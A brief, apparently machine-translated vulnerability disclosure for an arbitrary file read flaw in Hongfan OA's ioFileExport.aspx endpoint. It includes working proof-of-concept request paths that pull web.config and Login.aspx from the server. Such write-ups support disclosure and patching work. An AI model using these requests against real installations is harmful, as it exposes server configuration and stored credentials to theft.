Hongfan Oa Iofileexport Aspx Arbitrary File Reading Vulnerability
Hongfan Oa Iofileexport Aspx Arbitrary File Reading Vulnerability
Hongfan OA ioFileExport.aspx Arbitrary file reading vulnerability
Hongfan OA ioFileExport.aspx Arbitrary file reading vulnerability
Vulnerability Description
There is a vulnerability to read any file in Hongfan OA ioFileExport.aspx file. The attacker can obtain sensitive information of the server through the vulnerability.
Vulnerability Impact
Red Sail OA
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC and read web.config file
/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream
/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream
This post is licensed under CC BY 4.0 by the author.